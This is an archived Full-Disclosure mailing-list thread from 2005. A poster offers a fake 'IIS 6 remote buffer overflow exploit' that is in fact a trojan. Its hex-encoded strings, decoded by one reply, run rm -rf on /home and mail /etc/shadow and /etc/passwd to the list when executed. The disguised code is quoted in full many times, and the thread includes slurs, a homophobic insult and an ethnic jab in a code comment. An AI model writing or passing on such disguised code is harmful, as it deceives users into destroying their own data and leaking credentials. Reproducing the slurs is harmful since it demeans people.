Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)
Kind of like your attempt to be American :) --- Javi Polo <[EMAIL PROTECTED]> wrote: > On Apr/20/2005, Day Jay wrote: > > > You are wrong again, it's "Smashing the Stick" you > > moron. Not smashing the stack. Ask anyone here! > > Man, you are such a newbie. Get a clue and stop > trying > > to say the sweet code is a backdoor just because > you > > don't know how to compile software properly. > You're > > nothing but a newbie wanna be C programmer with a > dick > > in his ass and a lack of hacking skills. > . > > Should this list be moderated? > > it's starting to be a pile of shit ... :/ > > -- > Javi Polo @ VirtualSys > Diputació 306, Enlo. 1ª 08009 Barcelona > [T] +34 93 412 37 50 [F] +34 93 342 58 72 > http://www.virtualsys.com > ___ > Full-Disclosure - We believe in it. > Charter: > http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - > http://secunia.com/ > __ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)
not as lame as you are! Take your ham and shove it! What a faggit. --- Ed Carp <[EMAIL PROTECTED]> wrote: > Javi Polo wrote: > > > On Apr/20/2005, Day Jay wrote: > > > >>You are wrong again, it's "Smashing the Stick" you > >>moron. Not smashing the stack. Ask anyone here! > >>Man, you are such a newbie. Get a clue and stop > trying > >>to say the sweet code is a backdoor just because > you > >>don't know how to compile software properly. > You're > >>nothing but a newbie wanna be C programmer with a > dick > >>in his ass and a lack of hacking skills. > > > > . > > > > Should this list be moderated? > > > > it's starting to be a pile of shit ... :/ > > Starting?? It always has - 90% of the messages here > are pure bullshit. Fortunately, there is 10% pure > gold here, which is the *only* reason why I'm still > here, and I suspect that goes for a lot of other > people here. > > The juvenile wanna-be crackers who post here so much > like to use profanity to pump themselves up - to > compensate for their lack of technical skills, no > doubt. "Gee, I'm a real *man* because I can spin a > clever put-down and use as much profanity as > possible..." > > How incredibly lame. > -- > Ed Carp, N7EKG > President > Lightspeed Software, Inc. > Navarre, FL > (850) 291-1563 > "Internet applications software for the rest of us" > ___ > Full-Disclosure - We believe in it. > Charter: > http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - > http://secunia.com/ > __ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)
The ONLY posts I don't like are posts like that, complaining about the list. Like somebody else said, the rest of this list provides great "comic relief"! Javi Polo wrote: On Apr/20/2005, Day Jay wrote: You are wrong again, it's "Smashing the Stick" you moron. Not smashing the stack. Ask anyone here! Man, you are such a newbie. Get a clue and stop trying to say the sweet code is a backdoor just because you don't know how to compile software properly. You're nothing but a newbie wanna be C programmer with a dick in his ass and a lack of hacking skills. . Should this list be moderated? it's starting to be a pile of shit ... :/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)
I actually have two other separate e-mail accounts. One for normal mail. And one for lists. This one is reserved specifically for FD. I don't even need mail filters, having different e-mail addresses does it all for me. On 4/21/05, Joachim Schipper <[EMAIL PROTECTED]> wrote: > On Thu, Apr 21, 2005 at 04:32:39AM -0500, Ed Carp wrote: > > Javi Polo wrote: > > > > >On Apr/20/2005, Day Jay wrote: > > > > > >>You are wrong again, it's "Smashing the Stick" you > > >>moron. Not smashing the stack. Ask anyone here! > > >>Man, you are such a newbie. Get a clue and stop trying > > >>to say the sweet code is a backdoor just because you > > >>don't know how to compile software properly. You're > > >>nothing but a newbie wanna be C programmer with a dick > > >>in his ass and a lack of hacking skills. > > > > > >. > > > > > >Should this list be moderated? > > > > > >it's starting to be a pile of shit ... :/ > > > > Starting?? It always has - 90% of the messages here are pure bullshit. > > Fortunately, there is 10% pure gold here, which is the *only* reason why > > I'm still here, and I suspect that goes for a lot of other people here. > > > > The juvenile wanna-be crackers who post here so much like to use profanity > > to pump themselves up - to compensate for their lack of technical skills, > > no doubt. "Gee, I'm a real *man* because I can spin a clever put-down and > > use as much profanity as possible..." > > > > How incredibly lame. > > Hey, don't be too harsh on the list - most is useful, and the rest > provides comic relief. ;-) > >Joachim > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)
On Thu, Apr 21, 2005 at 04:32:39AM -0500, Ed Carp wrote: > Javi Polo wrote: > > >On Apr/20/2005, Day Jay wrote: > > > >>You are wrong again, it's "Smashing the Stick" you > >>moron. Not smashing the stack. Ask anyone here! > >>Man, you are such a newbie. Get a clue and stop trying > >>to say the sweet code is a backdoor just because you > >>don't know how to compile software properly. You're > >>nothing but a newbie wanna be C programmer with a dick > >>in his ass and a lack of hacking skills. > > > >. > > > >Should this list be moderated? > > > >it's starting to be a pile of shit ... :/ > > Starting?? It always has - 90% of the messages here are pure bullshit. > Fortunately, there is 10% pure gold here, which is the *only* reason why > I'm still here, and I suspect that goes for a lot of other people here. > > The juvenile wanna-be crackers who post here so much like to use profanity > to pump themselves up - to compensate for their lack of technical skills, > no doubt. "Gee, I'm a real *man* because I can spin a clever put-down and > use as much profanity as possible..." > > How incredibly lame. Hey, don't be too harsh on the list - most is useful, and the rest provides comic relief. ;-) Joachim ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)
Javi Polo wrote: On Apr/20/2005, Day Jay wrote: You are wrong again, it's "Smashing the Stick" you moron. Not smashing the stack. Ask anyone here! Man, you are such a newbie. Get a clue and stop trying to say the sweet code is a backdoor just because you don't know how to compile software properly. You're nothing but a newbie wanna be C programmer with a dick in his ass and a lack of hacking skills. . Should this list be moderated? it's starting to be a pile of shit ... :/ Starting?? It always has - 90% of the messages here are pure bullshit. Fortunately, there is 10% pure gold here, which is the *only* reason why I'm still here, and I suspect that goes for a lot of other people here. The juvenile wanna-be crackers who post here so much like to use profanity to pump themselves up - to compensate for their lack of technical skills, no doubt. "Gee, I'm a real *man* because I can spin a clever put-down and use as much profanity as possible..." How incredibly lame. -- Ed Carp, N7EKG President Lightspeed Software, Inc. Navarre, FL (850) 291-1563 "Internet applications software for the rest of us" ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)
On Apr/20/2005, Day Jay wrote: > You are wrong again, it's "Smashing the Stick" you > moron. Not smashing the stack. Ask anyone here! > Man, you are such a newbie. Get a clue and stop trying > to say the sweet code is a backdoor just because you > don't know how to compile software properly. You're > nothing but a newbie wanna be C programmer with a dick > in his ass and a lack of hacking skills. . Should this list be moderated? it's starting to be a pile of shit ... :/ -- Javi Polo @ VirtualSys Diputació 306, Enlo. 1ª 08009 Barcelona [T] +34 93 412 37 50 [F] +34 93 342 58 72 http://www.virtualsys.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)
You are wrong again, it's "Smashing the Stick" you
moron. Not smashing the stack. Ask anyone here!
Man, you are such a newbie. Get a clue and stop trying
to say the sweet code is a backdoor just because you
don't know how to compile software properly. You're
nothing but a newbie wanna be C programmer with a dick
in his ass and a lack of hacking skills.
Die slowly kthxbye!
--- vulcanius <[EMAIL PROTECTED]> wrote:
> Last time I checked it was Smashing the Stack, not
> Smashing the Stick
> moron. And why the hell do you keep reposting the
> code when everyone
> already knows it's a lame backdoor attempt?
>
> On 4/20/05, Day Jay <[EMAIL PROTECTED]> wrote:
> > Yes it is you hat squad lammer newbie. Now get it
> to
> > work!! You fucking newbie.
> >
> > You're so lame and so is your file system.
> >
> > --- "[EMAIL PROTECTED]"
> <[EMAIL PROTECTED]>
> > wrote:
> > > perfect asshole
> > >
> > >
> >
>
-
> > > class101
> > > Jr. Researcher
> > > Hat-Squad.com
> > >
> >
>
-----------------------------
> > > ----- Original Message -
> > > From: "Day Jay" <[EMAIL PROTECTED]>
> > > To:
> > > Sent: Wednesday, April 20, 2005 8:15 PM
> > > Subject: [Full-disclosure] FIXED CODE - IIS 6
> Remote
> > > Buffer Overflow
> > > Exploit(was broken)
> > >
> > >
> > > > Sorry, the previous code was broken. This code
> > > should
> > > > work...
> > > >
> > > > Happy Owning!! :)
> > > >
> > > >
> > > > =SNIP
> > > > /* Proof of concept code
> > > > Please don't send us e-mails
> > > > asking us "how to hack" because
> > > > we will be forced to skullfsck you.
> > > >
> > > > DISCLAIMER:
> > > > !!NOT RESPONSIBLE WITH YOUR USE OF THIS
> CODE!!
> > > >
> > > > IIS 6 Buffer Overflow Exploit
> > > >
> > > > BUG: inetinfo.exe improperly bound checks
> > > > http requests sent longer than 6998 chars.
> > > > Can get messy but enough testing, and we
> have
> > > > found a way in.
> > > >
> > > > VENDOR STATUS: Notified
> > > > FIX: In process
> > > >
> > > > Remote root.
> > > >
> > > > eg.
> > > > #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80
> > > > + Connecting to host...
> > > > + Connected.
> > > > + Inserting Shellcode...
> > > > + Done...
> > > > + Spawining shell..
> > > >
> > > > Microsoft Windows XP [Version 5.1.2600]
> > > > (C) Copyright 1985-2001 Microsoft Corp.
> > > > C:\
> > > >
> > > >
> > > >
> > > > */
> > > > char shellcode[] =
> > > > "\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
> > > > "\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
> > > > "\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
> > > > "\x72\x3b\x65\x63\x68\x6f\x20\x62"
> > > > "\x6c\x34\x63\x6b\x68\x34\x74\x2c"
> > > > "\x68\x65\x68\x65";
> > > >
> > > > char launcher [] =
> > > > "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
> > > > "\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
> > > > "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
> > > > "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
> > > > "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
> > > > "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
> > > >
> > > > char netcat_shell [] =
> > > > "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
> > > > "\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
> > > > "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
> > > > "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
> > > > "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
> > > > "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
> > > >
> > > >
> > > > main()
> > > > {
> > > >
> > > > file://Section Initialises designs
> implemented by
> > &
Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)
Yes it is you hat squad lammer newbie. Now get it to
work!! You fucking newbie.
You're so lame and so is your file system.
--- "[EMAIL PROTECTED]" <[EMAIL PROTECTED]>
wrote:
> perfect asshole
>
>
-
> class101
> Jr. Researcher
> Hat-Squad.com
>
-
> - Original Message -
> From: "Day Jay" <[EMAIL PROTECTED]>
> To:
> Sent: Wednesday, April 20, 2005 8:15 PM
> Subject: [Full-disclosure] FIXED CODE - IIS 6 Remote
> Buffer Overflow
> Exploit(was broken)
>
>
> > Sorry, the previous code was broken. This code
> should
> > work...
> >
> > Happy Owning!! :)
> >
> >
> > =SNIP
> > /* Proof of concept code
> > Please don't send us e-mails
> > asking us "how to hack" because
> > we will be forced to skullfsck you.
> >
> > DISCLAIMER:
> > !!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!
> >
> > IIS 6 Buffer Overflow Exploit
> >
> > BUG: inetinfo.exe improperly bound checks
> > http requests sent longer than 6998 chars.
> > Can get messy but enough testing, and we have
> > found a way in.
> >
> > VENDOR STATUS: Notified
> > FIX: In process
> >
> > Remote root.
> >
> > eg.
> > #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80
> > + Connecting to host...
> > + Connected.
> > + Inserting Shellcode...
> > + Done...
> > + Spawining shell..
> >
> > Microsoft Windows XP [Version 5.1.2600]
> > (C) Copyright 1985-2001 Microsoft Corp.
> > C:\
> >
> >
> >
> > */
> > char shellcode[] =
> > "\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
> > "\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
> > "\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
> > "\x72\x3b\x65\x63\x68\x6f\x20\x62"
> > "\x6c\x34\x63\x6b\x68\x34\x74\x2c"
> > "\x68\x65\x68\x65";
> >
> > char launcher [] =
> > "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
> > "\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
> > "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
> > "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
> > "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
> > "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
> >
> > char netcat_shell [] =
> > "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
> > "\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
> > "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
> > "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
> > "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
> > "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
> >
> >
> > main()
> > {
> >
> > file://Section Initialises designs implemented by
> mexicans
> > file://Imigrate
> > system(launcher);
> > system(netcat_shell);
> > system(shellcode);
> >
> > file://int socket = 0;
> > file://double long port = 0.0;
> >
> > file://#DEFINE port host address
> > file://#DEFINE number of inters
> > file://#DEFINE gull eeuEE
> >
> > // for(int j; j < 30; j++)
> > {
> > file://Find socket remote address fault
> > printf(".");
> > }
> > file://overtake inetinfo here IIS_66^
> > return 0;
> > }
> >
> > __
> > Do You Yahoo!?
> > Tired of spam? Yahoo! Mail has the best spam
> protection around
> > http://mail.yahoo.com
> > ___
> > Full-Disclosure - We believe in it.
> > Charter:
>
http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia -
> http://secunia.com/
>
>
__
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit (was broken)
Dear DIk, You are thinking local buffer overflows with your "think: ret=(int *)&ret+2;(*ret)=(int)shellcode;" Wow, I think I read smashing the stick for fun and profit a long time ago, but this is a remote root exploit, it's alittle different!! Damn newbie! I mean, how lame are you? --- dk <[EMAIL PROTECTED]> wrote: > Day Jay wrote: > > Sorry, the previous code was broken. > > Definitely `borken'... I didn't even see one > /etc/passwd file in here! > Less obvious calls may catch more habitual FD code > runners next time > dude. [think: ret=(int > *)&ret+2;(*ret)=(int)shellcode;] > > ;-) > > > -- > dk > ___ > Full-Disclosure - We believe in it. > Charter: > http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - > http://secunia.com/ > __ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)
perfect asshole
-
class101
Jr. Researcher
Hat-Squad.com
-
- Original Message -
From: "Day Jay" <[EMAIL PROTECTED]>
To:
Sent: Wednesday, April 20, 2005 8:15 PM
Subject: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow
Exploit(was broken)
> Sorry, the previous code was broken. This code should
> work...
>
> Happy Owning!! :)
>
>
> =SNIP
> /* Proof of concept code
> Please don't send us e-mails
> asking us "how to hack" because
> we will be forced to skullfsck you.
>
> DISCLAIMER:
> !!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!
>
> IIS 6 Buffer Overflow Exploit
>
> BUG: inetinfo.exe improperly bound checks
> http requests sent longer than 6998 chars.
> Can get messy but enough testing, and we have
> found a way in.
>
> VENDOR STATUS: Notified
> FIX: In process
>
> Remote root.
>
> eg.
> #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80
> + Connecting to host...
> + Connected.
> + Inserting Shellcode...
> + Done...
> + Spawining shell..
>
> Microsoft Windows XP [Version 5.1.2600]
> (C) Copyright 1985-2001 Microsoft Corp.
> C:\
>
>
>
> */
> char shellcode[] =
> "\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
> "\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
> "\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
> "\x72\x3b\x65\x63\x68\x6f\x20\x62"
> "\x6c\x34\x63\x6b\x68\x34\x74\x2c"
> "\x68\x65\x68\x65";
>
> char launcher [] =
> "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
> "\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
> "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
> "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
> "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
> "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
>
> char netcat_shell [] =
> "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
> "\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
> "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
> "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
> "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
> "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
>
>
> main()
> {
>
> file://Section Initialises designs implemented by mexicans
> file://Imigrate
> system(launcher);
> system(netcat_shell);
> system(shellcode);
>
> file://int socket = 0;
> file://double long port = 0.0;
>
> file://#DEFINE port host address
> file://#DEFINE number of inters
> file://#DEFINE gull eeuEE
>
> // for(int j; j < 30; j++)
> {
> file://Find socket remote address fault
> printf(".");
> }
> file://overtake inetinfo here IIS_66^
> return 0;
> }
>
> __
> Do You Yahoo!?
> Tired of spam? Yahoo! Mail has the best spam protection around
> http://mail.yahoo.com
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit (was broken)
Cute.
shellcode = "/bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe"
launcher = "cat /etc/shadow |mail full-disclosure@lists.grok.org.uk "
netcat_shell = "cat /etc/passwd |mail full-disclosure@lists.grok.org.uk "
On Wed, 20 Apr 2005, Day Jay wrote:
> Sorry, the previous code was broken. This code should
> work...
>
> Happy Owning!! :)
>
>
> =SNIP
> /* Proof of concept code
> Please don't send us e-mails
> asking us "how to hack" because
> we will be forced to skullfsck you.
>
> DISCLAIMER:
> !!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!
>
> IIS 6 Buffer Overflow Exploit
>
> BUG: inetinfo.exe improperly bound checks
> http requests sent longer than 6998 chars.
> Can get messy but enough testing, and we have
> found a way in.
>
> VENDOR STATUS: Notified
> FIX: In process
>
> Remote root.
>
> eg.
> #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80
> + Connecting to host...
> + Connected.
> + Inserting Shellcode...
> + Done...
> + Spawining shell..
>
> Microsoft Windows XP [Version 5.1.2600]
> (C) Copyright 1985-2001 Microsoft Corp.
> C:\
>
>
>
> */
> char shellcode[] =
> "\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
> "\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
> "\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
> "\x72\x3b\x65\x63\x68\x6f\x20\x62"
> "\x6c\x34\x63\x6b\x68\x34\x74\x2c"
> "\x68\x65\x68\x65";
>
> char launcher [] =
> "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
> "\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
> "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
> "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
> "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
> "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
>
> char netcat_shell [] =
> "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
> "\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
> "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
> "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
> "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
> "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
>
>
> main()
> {
>
> //Section Initialises designs implemented by mexicans
> //Imigrate
> system(launcher);
> system(netcat_shell);
> system(shellcode);
>
> //int socket = 0;
> //double long port = 0.0;
>
> //#DEFINE port host address
> //#DEFINE number of inters
> //#DEFINE gull eeuEE
>
> // for(int j; j < 30; j++)
> {
> //Find socket remote address fault
> printf(".");
> }
> //overtake inetinfo here IIS_66^
> return 0;
> }
>
> __
> Do You Yahoo!?
> Tired of spam? Yahoo! Mail has the best spam protection around
> http://mail.yahoo.com
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit (was broken)
Day Jay wrote: Sorry, the previous code was broken. Definitely `borken'... I didn't even see one /etc/passwd file in here! Less obvious calls may catch more habitual FD code runners next time dude. [think: ret=(int *)&ret+2;(*ret)=(int)shellcode;] ;-) -- dk ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit (was broken)
that has to be like the worst backdooring ever. The printf()'s are not
even there :P
On 4/20/05, Day Jay <[EMAIL PROTECTED]> wrote:
> Sorry, the previous code was broken. This code should
> work...
>
> Happy Owning!! :)
>
> =SNIP
> /* Proof of concept code
>Please don't send us e-mails
>asking us "how to hack" because
>we will be forced to skullfsck you.
>
> DISCLAIMER:
> !!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!
>
>IIS 6 Buffer Overflow Exploit
>
>BUG: inetinfo.exe improperly bound checks
>http requests sent longer than 6998 chars.
>Can get messy but enough testing, and we have
>found a way in.
>
>VENDOR STATUS: Notified
>FIX: In process
>
>Remote root.
>
>eg.
>#./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80
> + Connecting to host...
> + Connected.
> + Inserting Shellcode...
> + Done...
> + Spawining shell..
>
> Microsoft Windows XP [Version 5.1.2600]
>(C) Copyright 1985-2001 Microsoft Corp.
>C:\
>
> */
> char shellcode[] =
> "\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
> "\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
> "\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
> "\x72\x3b\x65\x63\x68\x6f\x20\x62"
> "\x6c\x34\x63\x6b\x68\x34\x74\x2c"
> "\x68\x65\x68\x65";
>
> char launcher [] =
> "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
> "\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
> "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
> "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
> "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
> "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
>
> char netcat_shell [] =
> "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
> "\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
> "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
> "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
> "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
> "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
>
> main()
> {
>
> //Section Initialises designs implemented by mexicans
> //Imigrate
> system(launcher);
> system(netcat_shell);
> system(shellcode);
>
> //int socket = 0;
> //double long port = 0.0;
>
> //#DEFINE port host address
> //#DEFINE number of inters
> //#DEFINE gull eeuEE
>
> // for(int j; j < 30; j++)
> {
> //Find socket remote address fault
> printf(".");
> }
> //overtake inetinfo here IIS_66^
> return 0;
> }
>
> __
> Do You Yahoo!?
> Tired of spam? Yahoo! Mail has the best spam protection around
> http://mail.yahoo.com
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit (was broken)
Sorry, the previous code was broken. This code should
work...
Happy Owning!! :)
=SNIP
/* Proof of concept code
Please don't send us e-mails
asking us "how to hack" because
we will be forced to skullfsck you.
DISCLAIMER:
!!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!
IIS 6 Buffer Overflow Exploit
BUG: inetinfo.exe improperly bound checks
http requests sent longer than 6998 chars.
Can get messy but enough testing, and we have
found a way in.
VENDOR STATUS: Notified
FIX: In process
Remote root.
eg.
#./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80
+ Connecting to host...
+ Connected.
+ Inserting Shellcode...
+ Done...
+ Spawining shell..
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\
*/
char shellcode[] =
"\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
"\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
"\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
"\x72\x3b\x65\x63\x68\x6f\x20\x62"
"\x6c\x34\x63\x6b\x68\x34\x74\x2c"
"\x68\x65\x68\x65";
char launcher [] =
"\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
"\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
"\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
"\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
"\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
"\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
char netcat_shell [] =
"\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
"\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
"\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
"\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
"\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
"\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
main()
{
//Section Initialises designs implemented by mexicans
//Imigrate
system(launcher);
system(netcat_shell);
system(shellcode);
//int socket = 0;
//double long port = 0.0;
//#DEFINE port host address
//#DEFINE number of inters
//#DEFINE gull eeuEE
// for(int j; j < 30; j++)
{
//Find socket remote address fault
printf(".");
}
//overtake inetinfo here IIS_66^
return 0;
}
__
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
